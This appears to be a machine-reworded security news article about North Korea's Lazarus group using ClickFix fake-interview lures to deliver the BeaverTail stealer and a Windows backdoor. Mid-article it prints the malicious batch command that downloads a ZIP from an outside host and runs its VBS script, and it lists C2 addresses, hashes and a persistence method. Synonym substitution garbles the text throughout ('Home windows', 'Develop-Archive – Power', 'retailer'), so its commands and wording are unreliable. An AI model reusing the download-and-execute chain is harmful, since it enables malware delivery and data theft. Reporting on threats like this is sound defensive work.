The infamous Lazarus APT group has developed its assault methodology by incorporating the more and more well-liked ClickFix social engineering approach to distribute malware and steal delicate intelligence knowledge from focused organizations.
This North Korean-linked risk actor, internally tracked as APT-Q-1 by safety researchers, has demonstrated exceptional adaptability by integrating misleading consumer interface manipulation with their conventional espionage operations.
The ClickFix approach represents a complicated social engineering method the place attackers current victims with fabricated technical points, then information them via seemingly reputable “fixes” that really execute malicious code.
Lazarus has weaponized this technique inside their established faux recruitment marketing campaign infrastructure, making a multi-layered assault vector that mixes job alternative lures with technical deception.
CN-SEC analysts recognized this marketing campaign via the invention of a malicious batch script that downloads disguised NVIDIA software program packages, which subsequently deploy the group’s signature BeaverTail info stealer.
The assault chain begins when victims are lured to fraudulent interview web sites that immediate them to organize their interview atmosphere, ultimately claiming digicam configuration points require fast decision.
Phishing operation (Supply – CN-SEC)
The technical sophistication of this operation extends past easy social engineering. Victims are offered with what seems to be a reputable NVIDIA driver replace command, however the underlying payload morphs right into a malicious execution sequence.
The first an infection vector makes use of a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure.
Latest evaluation reveals that the group has expanded operations to focus on each Home windows and macOS platforms, demonstrating cross-platform capabilities via tailor-made payloads for various working system architectures.
The Home windows variant focuses on enterprise environments via Node.js-based deployment mechanisms, whereas macOS variations make the most of shell scripts designed for Apple Silicon and Intel processors.
Malware Deployment and Persistence Mechanisms
The core malware bundle, distributed as “nvidiaRelease[.]zip” (MD5: f9e18687a38e968811b93351e9fca089), comprises a number of parts designed for cross-platform compatibility and chronic entry.
nvidiaRelease.zip contents (Supply – CN-SEC)
The preliminary ClickFix-1.bat script executes the next command sequence:-
curl – ok – o “%TEMP%nvidiaRelease[.]zip” https[:]//driverservices[.]retailer/visiodrive/nvidiaRelease[.]zip && powershell – Command “Develop-Archive – Power – Path ‘%TEMP%nvidiaRelease[.]zip’ – DestinationPath ‘%TEMP%nvidiaRelease'” && cscript “%TEMP%nvidiaReleaserun[.]vbs”
The extracted archive deploys run[.]vbs, which performs system reconnaissance to find out the Home windows construct quantity.
For Home windows 11 methods (construct 22000 or larger), the script moreover executes drvUpdate[.]exe, a complicated backdoor able to command execution and file manipulation.
This binary establishes communication with command-and-control servers at 103.231.75.101:8888, implementing features together with system info assortment, distant command execution, and file switch capabilities.
Core Malware Elements:-
ComponentMD5 HashFunctionClickFix-1[.]bata4e58b91531d199f268c5ea02c7bf456Initial payload downloadernvidiaRelease[.]zipf9e18687a38e968811b93351e9fca089Malicious archive packagerun[.]vbs3ef7717c8bcb26396fc50ed92e812d13System reconnaissance scriptmain.[]js (BeaverTail)b52e105bd040bda6639e958f7d9e3090Cross-platform info stealerdrvUpdate[.]exe6175efd148a89ca61b6835c77acc7a8dWindows 11 backdoor
The malware achieves persistence via registry modification, including an entry to the Home windows startup registry key that ensures execution throughout system reboots.
The BeaverTail part communicates with infrastructure at 45.159.248.110, demonstrating redundant command-and-control capabilities for sustaining long-term entry to compromised methods.
Enhance your SOC and assist your staff defend your online business with free top-notch risk intelligence: Request TI Lookup Premium Trial.
